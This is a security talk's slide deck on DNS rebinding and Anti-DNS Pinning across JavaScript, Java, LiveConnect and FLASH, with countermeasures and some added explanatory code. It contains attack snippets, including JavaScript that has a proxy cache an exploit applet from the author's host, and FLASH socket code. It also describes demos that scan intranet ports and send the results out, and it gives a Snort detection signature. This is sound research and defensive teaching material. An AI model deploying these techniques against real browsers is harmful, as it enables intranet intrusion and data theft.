
1 DNS Rebinding and Socket API Kanatoko


1 DNS Rebinding and Socket API
Kanatoko
http://www.jumperz.net/

2 DNS Rebinding Overview (1)
- One of the attack vectors
- Not a bug in a particular piece of software
- All kinds of operating systems may be affected
  – Windows, Linux, Mac OS X …
- There are no patches
- Occurs in the relationship between web servers, DNS servers and proxy servers
- Real threat
- Maybe your system is vulnerable

3 DNS Rebinding Overview (2)
- Eve controls the web browser of Alice
  – and makes it do something
  – Stealing information
  – Making Alice attack
- Not a direct attack against the servers
- Not an attack against the DNS servers

4 How is the attack deployed?
- Deployed when Alice visits Eve's trap page
  – Same as XSS, CSRF
- Unawares
  – Social engineering using e-mails, BBS posts, comments on blogs
  – It is difficult to find out whether a page is a trap or not
  – Sometimes hacked web sites (of famous companies, for example) are used to deploy the attack

5 Technologies used in DNS Rebinding
- JavaScript
- Java
- FLASH
- Malicious code starts running on Alice's browser
- But there are security constraints
  – For example: cannot read from or write to local files
- Each of these technologies has a network access function

6 When Alice visits Eve's page… (1)
- Eve's malicious code starts running and accesses the network
- JavaScript
  – Get resources using XMLHttpRequest, SCRIPT tag, IMG tag (HTTP)
- FLASH
  – URLLoader (HTTP)
  – Socket (TCP)
- Java
  – URLConnection (HTTP)
  – Socket (TCP)
  – DatagramSocket (UDP)

7 When Alice visits Eve's page… (2)
- Of course there are security constraints on the network access functions
- Can access only the origin host on which the Java applets (.class, .zip, .jar), FLASH SWF files or web pages are located
- Known as the "Same Origin Policy"

8 DNS Rebinding attack vector (1)
- Eve owns the top-level domain "eve.tld"
  – So Eve controls the DNS server of "eve.tld"
- Eve runs a web server at "218.45.25.5" and places the malicious code there
- Eve binds "218.45.25.5" as the address of the hostname "www.eve.tld"
- Eve sets a very short value (for example, 8 seconds) as the TTL of the DNS record
- Alice tries to access Eve's trap page located at "www.eve.tld"
- The first name resolution is done by Alice, and "218.45.25.5" is returned from Eve's DNS server
- Alice's browser loads Eve's trap page
- Soon the TTL expires
- At the same time, Eve changes the configuration of the DNS server and binds "127.0.0.1" as the address of the hostname "www.eve.tld"

9 DNS Rebinding attack vector (2)
- Eve's malicious code on Alice's browser tries to access "www.eve.tld"
- The second name resolution is done by Alice. This time "127.0.0.1" is returned from Eve's DNS server
- The code accesses "127.0.0.1"
- Though "127.0.0.1" is not Eve's host, the code is allowed to access it because the hostname is "www.eve.tld" (same origin)
- As the example above shows, DNS Rebinding enables Eve to access addresses like "127.0.0.1" which of course she should not be allowed to access

10 What is DNS Pinning?
- Only FLASH is vulnerable to the DNS Rebinding attack vector explained on the previous page
- The other two technologies (JavaScript and Java) cache the DNS information in their own ways
  – The TTL does not expire. This behavior violates the DNS protocol
  – It is called "DNS Pinning"
- Sun Microsystems implements DNS Pinning in Java as a countermeasure to DNS Rebinding (or DNS Spoofing)
  – On the other hand, the browser vendors (Microsoft, Mozilla.org and Opera) do not seem to be so conscious of DNS Rebinding
- Eve needs to make Alice discard the cached DNS information to execute DNS Rebinding

11 What is Anti-DNS Pinning? (1)
- Makes Alice discard the pinned DNS information
- Can be applied only to JavaScript
  – FLASH does not pin DNS at all
  – Java never discards the pinned DNS information. Java is immune to Anti-DNS Pinning
- Martin Johns notified the security community of this issue in August 2006
  – http://shampoo.antville.org/stories/1451301/

12 What is Anti-DNS Pinning? (2)
- If an access to the server fails after an appropriate period has elapsed, the browser discards the pinned DNS information and executes a second name resolution
  – Change the firewall rule
  – Shut down the web server
  – Make Alice access a closed port (for example http://example.com:81/)
- Anti-DNS Pinning makes it possible for Eve to force Alice to execute a second name resolution. Eve can launch DNS Rebinding as a result
- Anti-DNS Pinning is a step used in DNS Rebinding (against JavaScript)
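To make the difference between slides 10 to 12 concrete, here is a small model (added here, not the speaker's code) of the three caching behaviours the talk contrasts: honouring the TTL, pinning until a failed connection, and pinning for the process lifetime. The addresses and the 8-second TTL are the constructed values from slides 8 and 9; the class and function names are mine.

```python
"""Model of three DNS caching policies and a rebinding timeline (added example)."""


class EveDNS:
    """Eve's authoritative server for www.eve.tld; the answer can be swapped."""
    def __init__(self, answer: str, ttl: int):
        self.answer, self.ttl = answer, ttl

    def rebind(self, answer: str) -> None:
        self.answer = answer

    def lookup(self) -> tuple:
        return self.answer, self.ttl


class Client:
    """Resolver cache with one of three policies:
    'ttl'               honour the record TTL (FLASH)
    'pin_until_failure' keep the first answer until a connect fails after the TTL (browser JS)
    'pin_forever'       keep the first answer for the process lifetime (Java)"""
    def __init__(self, dns: EveDNS, policy: str):
        self.dns, self.policy = dns, policy
        self.cached = None  # (ip, resolved_at, ttl)

    def resolve(self, now: int) -> str:
        if self.cached:
            ip, at, ttl = self.cached
            if self.policy != "ttl" or now - at < ttl:
                return ip
        ip, ttl = self.dns.lookup()
        self.cached = (ip, now, ttl)
        return ip

    def connection_failed(self, now: int) -> None:
        """Anti-DNS Pinning trigger: a pinning browser drops its pin once a
        connect fails after the TTL has elapsed; Java keeps the pin regardless."""
        if self.policy == "pin_until_failure" and self.cached:
            if now - self.cached[1] >= self.cached[2]:
                self.cached = None


def same_origin(page_host: str, request_host: str) -> bool:
    """The policy compares host names, never the addresses they resolved to."""
    return page_host == request_host


def scenario(policy: str) -> tuple:
    """Run the slide 8/9 timeline and return the address used by each request."""
    dns = EveDNS("218.45.25.5", ttl=8)
    client = Client(dns, policy)
    first = client.resolve(now=0)       # trap page loads from Eve's server
    dns.rebind("127.0.0.1")             # Eve swaps the record once the TTL is up
    second = client.resolve(now=12)     # the script's first request
    client.connection_failed(now=12)    # that request is made to fail (closed port)
    third = client.resolve(now=13)      # the script's next request
    return first, second, third, same_origin("www.eve.tld", "www.eve.tld")
```

Only the `ttl` client reaches 127.0.0.1 on its first request, the `pin_until_failure` client gets there after the failed connect, and the `pin_forever` client never does; the same-origin check passes in every case because only the host name is compared.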

13 DNS Rebinding against JavaScript
- XMLHttpRequest is mainly used
- Get information from web servers that Eve cannot access without DNS Rebinding, and send it to Eve's host
- The targets are only web servers because HTTP is used in the communication
- It is not "Cross Domain" but "Cross Address". So the HTTP requests do not contain the Cookie and Authorization headers of the target web page
  – For this reason it is not used for CSRF
  – For the same reason it means almost nothing to force Alice to get information from the Internet. So the Intranet is the main target
  – There are some exceptions. If address-based authentication exists (for example, the countermeasure for the Universal PDF XSS issue), Eve may use DNS Rebinding to get information via Alice's browser
- Stolen information is sent to another of Eve's hosts. It is quite easy for Eve because there is no "Same Origin Policy" about sending data with JavaScript

14 Demo: DNS Rebinding on JavaScript
- http://www.jumperz.net/index.php?i=2&a=1&b=7
- Gets information from the Intranet and sends it to "www.jumperz.net"
- I was skeptical about whether DNS Rebinding was a real threat when I read Martin's article for the first time
- It took me 20 hours to make this demo work stably
- A web application (JSP), a DNS server (djbdns) and JavaScript on the browser are used
- Uses the "closed port method" to launch Anti-DNS Pinning
- Special thanks to Kawa from Team Tidori

15 JavaScript on each browser
- On Firefox, the code needs to wait about 2 minutes to launch Anti-DNS Pinning
- On IE6 and Opera, the code only needs to wait for the TTL value (a few seconds)
- IE7: not checked yet

16 Countermeasures for DNS Rebinding on JavaScript
- Require authentication for HTTP access
  – Basic authentication is enough
- Disabling JavaScript is perfect
- It is not a threat because easy and good countermeasures exist
- Of course the default usernames/passwords (of ADSL routers, for example) need to be changed

17 DNS Rebinding on FLASH and Java (1)
- Socket APIs are available
- Eve's code can implement any TCP-based protocol
- It is far more dangerous than DNS Rebinding on JavaScript
  – To any hosts on the Internet and the Intranet
  – With any TCP-based protocol
  – From Alice's browser
- Possible abuse:
  – Portscan
  – SPAM e-mails
  – Exploiting known vulnerabilities
  – File sharing networks
  – DoS attacks
  – Exploiting address-based authentication

18 DNS Rebinding on FLASH and Java (2)
- Eve can use Alice's browser as a TCP (or UDP) proxy, because Eve's malicious code can send and receive data at any time using another host like "www2.eve.tld", even in a DNS-rebound situation
- Alice's system (or network) could be both a victim and an assailant

19 DNS Rebinding on Java (1)
- Sun's Java Virtual Machine
- The code runs under a security restriction called the "Sandbox"
- The host that a Java applet is allowed to communicate with over the network is the origin of the applet. It is not the origin of the web page
- The Socket class (TCP) and the DatagramSocket class (UDP) are available
- Binary data can be sent and received
- Caches the DNS record until the termination of the process (forever). It is a very strong DNS Pinning
  – Apparently violates the DNS protocol. It causes trouble when you implement server applications like an SMTP server using Java
  – The JVM parameter "networkaddress.cache.ttl" enables you to control this behavior. But even in this case the TTL value of the DNS record is ignored
  – The "networkaddress.cache.ttl" parameter cannot be set from the Java applet

20 DNS Rebinding on Java (2)
- There was a related issue
  – http://www.cs.princeton.edu/sip/news/sun-02-22-96.html
- There are no configurations like "Disable sockets in Java applets"
- We cannot remove the Socket class from Java because it is also used in the download process of the applet
- Java downloads the applet by itself. It does not rely on the browser
  – So the cache of the browser is not used when the applet is downloaded by Java
  – Java does name resolution for downloading
- The point is that Java does name resolution BEFORE the applet has been downloaded
  – And the result of the name resolution will be cached forever

21 DNS Rebinding on Java (3)
- If Eve's DNS server returns the fake IP address as the result of Alice's name resolution, the Java applet will not be downloaded and the attack will fail
- If Eve's DNS server returns the correct IP address as the result of Alice's name resolution, the Java applet will be downloaded properly. But Eve cannot rebind the IP address because Alice's Java caches the result of the first name resolution forever. The attack will fail as a result
- In both cases the attack will fail
- Only users behind proxy servers are vulnerable
  – Business users on a corporate network with an application proxy gateway are more vulnerable than home users with NAT

22 DNS Rebinding on Java (4)
Make the proxy server cache the Java applet before Java is activated:

```javascript
// make the proxy cache the applet (the browser fetches the class file as an image)
var foo = new Image();
foo.src = "http://12345.jumperz.net/exploits/MTCPCApplet.class";

// wait for the TTL to expire
setTimeout( 'f1()', 1000 * 12 );

// add the applet tag to the page
function f1() {
  var base = document.getElementById( "base" );
  var str = ' ' + ' ' + ' ';  // applet tag markup (the tags were stripped from the transcript)
  base.innerHTML = str;
}
```

23 DNS Rebinding on Java (5)
- The download of the Java applet is done by the proxy server, even though Java does a name resolution and a spoofed IP address is returned. The cached copy of the Java applet in the proxy server is returned to Alice's Java, and Eve's malicious code starts running successfully

The request of the browser:

```http
GET /exploits/MTCPCApplet.class HTTP/1.0
Accept: */*
Referer: http://1190066223254.jumperz.net/exploits/ap3.jsp?address=127.0.0.1
Accept-Language: ja
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 2.0.50727)
Host: 1190066223254.jumperz.net
Cookie: JSESSIONID=C6D04DDABD28F3B0FACE61F9EA70B44A
Connection: Keep-Alive
```

The request of the Java applet:

```http
GET /exploits/MTCPCApplet.class HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 2000 5.0) Java/1.6.0_02
Host: 1190066223254.jumperz.net
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Cookie: JSESSIONID=C6D04DDABD28F3B0FACE61F9EA70B44A
Connection: keep-alive
```

24 Demo: DNS Rebinding on Java
- http://www.jumperz.net/index.php?i=2&a=1&b=10
- Scans some ports, retrieves the banner from the server, and sends the result to "www.jumperz.net"
- Works on IE, Firefox and Opera
- Works only for users behind a proxy

25 Countermeasures for DNS Rebinding on Java (1)
- Disabling Java
- Restrict the ports allowed to connect to using personal firewalls (for example: only 80 and 443)
- Require authentication for every protocol used on the Intranet
- Patch known vulnerabilities
- Use a firewall to find and stop the outgoing attacks (for example, UDP 53 DoS)
- It is not easy to find the malicious Java code on the gateway or with an IDS or IPS because the Java applet class file could be zipped into .zip and .jar files

26 Countermeasures for DNS Rebinding on Java (2)
Set up a JRE only for the Java applets and patch the SecurityManager class. In the patched checkConnect below, the requested host is replaced with "127.0.0.2" before the permission check, so the check no longer looks at the host the applet actually asked for:

```java
public void checkConnect(String host, int port) {
    if (host == null) {
        throw new NullPointerException("host can't be null");
    }
    // patch: check permission against a fixed address instead of the requested host
    host = "127.0.0.2";
    if (!host.startsWith("[") && host.indexOf(':') != -1) {
        host = "[" + host + "]";
    }
    if (port == -1) {
        checkPermission(new SocketPermission(host,
            SecurityConstants.SOCKET_RESOLVE_ACTION));
    } else {
        checkPermission(new SocketPermission(host + ":" + port,
            SecurityConstants.SOCKET_CONNECT_ACTION));
    }
}
```

27 DNS Rebinding on LiveConnect
- Works only if both Java and JavaScript are enabled
- One can write Java code inside JavaScript code
  – var s = new java.net.Socket( "www.jumperz.net", 25 )
- It is a part of the "LiveConnect" technology
- Not supported on IE
- Eve can send the malicious Java code to Alice before Java is activated
  – Users NOT behind a proxy are also vulnerable
- In Opera's implementation of LiveConnect there seem to be some bugs
- Firefox is the most dangerous browser

28 Demo: DNS Rebinding on LiveConnect
- http://www.jumperz.net/index.php?i=2&a=1&b=9
- A collaboration between Martin Johns and me
  – http://shampoo.antville.org/stories/1566124/
- Scans some ports, retrieves the banner from the server, and sends the result to www.jumperz.net
- Works on Firefox and Opera

29 Countermeasures for DNS Rebinding on LiveConnect
- The same as those for Java

30 DNS Rebinding on FLASH (1)
- The Socket class is available from ActionScript 3.0
  – Can communicate with a server using a TCP-layer protocol
  – Binary data can be sent and received
  – Works on Flash Player 9.0 or later
- The host that FLASH is allowed to communicate with over the network is the origin of the FLASH .swf file. It is not the origin of the web page
- FLASH does not implement DNS Pinning at all
  – The DNS information will be discarded after the TTL has elapsed
  – DNS Rebinding on FLASH is very easy
- It is a threat that FLASH has added the Socket class, because FLASH is one of the most widely used plugins. Many users enable FLASH on their browsers
- There are no configurations like "Disable sockets on FLASH"

31 DNS Rebinding on FLASH (2)
An example of code using the Socket class:

```actionscript
private var sock1:Socket;

private function test1():void {
    // assign the field; a local "var sock1" here would shadow it and leave the field null
    sock1 = new Socket();
    sock1.addEventListener( Event.CONNECT, onConnected );
    sock1.connect( "www.jumperz.net", 80 );
}

private function onConnected( e:Event ):void {
    sock1.writeMultiByte( "GET / HTTP/1.0\r\n\r\n", "ISO-8859-1" );
    sock1.flush();  // data stays in the output buffer until flushed
}
```

32 DNS Rebinding on FLASH (3)
- Can connect only to ports above 1024 by default. This is a difference between FLASH and Java
- Policy-loading is required to connect to ports under 1024. This is done using an original TCP-based protocol
  – Policy-loading works successfully under NAT
  – Eve could use port 443 for policy-loading
- Detecting the network traffic of the policy-loading with an IDS or IPS would have some meaning
- An example signature (Snort), matching the policy-file request marker a Flash socket sends before connecting:

```
# local sid: pick one in the 1000000+ range reserved for local rules
alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"FLASH Socket policy-file-request"; flow:to_server,established; content:"<policy-file-request/>"; nocase; sid:1000001; rev:1;)
```

33 DNS Rebinding on FLASH (4)
An example of code for policy-loading and the traffic it produces:

```actionscript
// load the policy using port 2
flash.system.Security.loadPolicyFile( "xmlsocket://www.jumperz.net:2" );
```

Traffic of the policy-loading: from client to server; from server to client

34 Demo: DNS Rebinding on FLASH
- http://www.jumperz.net/index.php?i=2&a=1&b=8
- This demo notified the security community of the existence of the Socket class in FLASH
- Works on Flash Player 9.0 or later
- Cannot scan ports under 1024 on a non-NAT network because of the FLASH policy-loading mechanism
- Scans some ports, retrieves the banner from the server, and sends the result to "www.jumperz.net"

35 Countermeasures for DNS Rebinding on FLASH (1)
- Disabling FLASH
- The same as those for Java

36 Countermeasures for DNS Rebinding on FLASH (2)
- Patch the .dll or .ocx files
  – Overwrite the "call" instruction to the "connect" winsock API
- Almost no side effects (you can still watch YouTube)
- Disassembly: BEFORE / AFTER the patch

37 Dynamic DNS and DNS Pinning
- At some point an IP address is used by Bob's web server
- Alice visits Bob's web site
- Bob's connection is lost and he reconnects to the Internet, and the IP address of Bob's server changes
  – Soon Bob rebinds the new IP address to his hostname using some Dynamic DNS system
- Eve gets Bob's old IP address (bound by the ISP, with DHCP)
- If Alice has pinned the DNS information of Bob's hostname, Alice's HTTP requests will be sent to Eve's web server. Of course they should be sent to Bob's web server
  – In this case Eve can get Alice's session id from the cookie and can hijack her session
- This can happen to every web site because every service based on DNS is "dynamic" in the long term
- It means that DNS Pinning may cause another security problem

38 Countermeasures on all 3 technologies
- Monitoring DNS packets (is there any good system for this purpose?)
  – Change of IP address in a short period
  – Especially from a global IP to a private IP
  – It is hard to find DNS Rebinding attacks from the TTL values because very short TTL values are widely used
- The Firefox plugins are useful (NoScript, FlashBlock etc.)
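The monitoring idea on this slide, as an added example (not the speaker's code): a detector that walks DNS answer log lines and flags a name whose address changes within a short window, rating a global-to-private or loopback flip higher than ordinary churn. The log format and sample lines are constructed; TTL is deliberately ignored for the reason the slide gives.

```python
"""Flag DNS rebinding candidates in DNS answer logs (added example)."""
import ipaddress

# Constructed sample log, one answer per line: "<unix_time> <qname> <rdata> <ttl>".
# Line 2 is the slide 8/9 flip to loopback; lines 4 and 5 are ordinary CDN churn.
SAMPLE_LOG = """\
1190066200 www.eve.tld 218.45.25.5 8
1190066209 www.eve.tld 127.0.0.1 8
1190066210 www.example.org 93.184.216.34 300
1190066300 cdn.example.net 198.51.100.7 20
1190066330 cdn.example.net 198.51.100.9 20
"""


def is_non_global(addr: str) -> bool:
    """True for private, loopback and link-local addresses (RFC 1918, 127/8, 169.254/16 ...)."""
    ip = ipaddress.ip_address(addr)
    return ip.is_private or ip.is_loopback or ip.is_link_local


def detect_rebinds(log: str, window: int = 120):
    """Return (qname, old_ip, new_ip, seconds_between, severity) for every name
    whose answer changed within `window` seconds of the previous answer.

    The TTL field is parsed but never used as a signal: very short TTLs are
    common on legitimate zones, so only the address flip itself is examined."""
    last = {}      # qname -> (time, ip) of the most recent answer seen
    alerts = []
    for line in log.splitlines():
        ts_text, qname, rdata, _ttl = line.split()
        ts = int(ts_text)
        prev = last.get(qname)
        if prev is not None and prev[1] != rdata and ts - prev[0] <= window:
            # A public address re-pointed at an internal one is the rebinding pattern.
            if not is_non_global(prev[1]) and is_non_global(rdata):
                severity = "high"
            else:
                severity = "low"
            alerts.append((qname, prev[1], rdata, ts - prev[0], severity))
        last[qname] = (ts, rdata)
    return alerts


if __name__ == "__main__":
    for alert in detect_rebinds(SAMPLE_LOG):
        print("%-5s %s: %s -> %s after %ds" % (alert[4], alert[0], alert[1], alert[2], alert[3]))
```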

39 Other things
- DNS Rebinding is a really complicated problem
  – Web browsers
  – Plugins
  – DNS
  – Proxies
- Real threat
- We cannot find attacks if we are not prepared to find them
- Do we need some detection system for DNS Rebinding, as a first step?
- We need more flexible configurations on the browsers
  – "Disable/Enable Sockets on Java/FLASH"
  – "IP address has changed" notification dialogs

40 Thank you! Any questions?

